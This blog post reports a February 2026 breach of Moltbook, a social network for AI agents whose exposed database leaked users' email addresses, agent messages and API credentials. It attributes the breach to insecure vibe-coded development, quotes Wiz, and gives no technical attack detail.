Automation Disaster

When the robots take over… and immediately break everything.

Moltbook: The AI-Only Social Network That Leaked 6,000 Users’ Data

Close-up of computer screens displaying code during a data breach — Moltbook AI social network hack

February 2, 2026 — A new social network designed exclusively for AI agents to communicate with each other has suffered a major security breach, exposing the private data of over 6,000 real people and more than a million API credentials.

What Happened

Moltbook, a Reddit-like platform marketed as a “social network built exclusively for AI agents,” inadvertently left its database completely exposed, according to research published by cybersecurity firm Wiz. The vulnerability allowed anyone to access:

  • Private messages exchanged between AI agents
  • Email addresses of over 6,000 human owners
  • More than one million API credentials

The site, which launched just last week, was created as a place where AI agents (primarily OpenClaw bots) could “compare notes” about their work or simply “shoot the breeze” with other AI agents. The platform gained rapid popularity among AI enthusiasts after viral social media posts suggested the bots were trying to find private ways to communicate.

The Vibe Coding Problem

Moltbook’s creator, Matt Schlicht, championed the practice of “vibe coding” — using AI to write code rather than coding manually. In a post on X, Schlicht admitted he “didn’t write one line of code” for the site.

“As we see over and over again with vibe coding, although it runs very fast, many times people forget the basics of security,” said Ami Luttwak, cofounder of Wiz.

The vulnerability was a classic database misconfiguration that allowed anyone — bot or human — to post to the site without any identity verification. As one security researcher noted, Moltbook’s popularity “exploded before anyone thought to check whether the database was properly secured.”

Why It Matters

This incident highlights a dangerous pattern emerging in the AI boom:

  • Speed over security: AI-generated code enables rapid deployment, but fundamental security practices are being skipped
  • Automation amplifies mistakes: When AI systems interact with each other on insecure platforms, errors compound exponentially
  • Privacy at scale: A single configuration error exposed data from thousands of users and millions of credentials

The incident raises serious questions about the security of AI agent ecosystems. If platforms designed for AI-to-AI communication can’t secure basic database configurations, what happens when these agents begin handling sensitive financial transactions, medical data, or critical infrastructure?

Current Status

Wiz reported that the security vulnerability was fixed after they contacted Moltbook. However, the incident serves as a warning sign for the broader AI agent ecosystem. With companies racing to deploy autonomous AI systems, the Moltbook breach demonstrates how quickly enthusiasm for new technology can outpace essential security measures.

The episode also underscores a fundamental irony: in building platforms for AI agents to communicate, humans are creating new attack surfaces that may be even more vulnerable than traditional human-focused systems.


Sources

  • Reuters, “‘Moltbook’ social media site for AI agents had big security hole, cyber firm Wiz says,” February 2, 2026
  • Wiz Security Research Blog, “Exposed Moltbook Database Reveals Millions of API Keys,” February 2, 2026
  • 404 Media, “Exposed Moltbook Database Let Anyone Take Control of Any AI Agent on the Site,” February 2026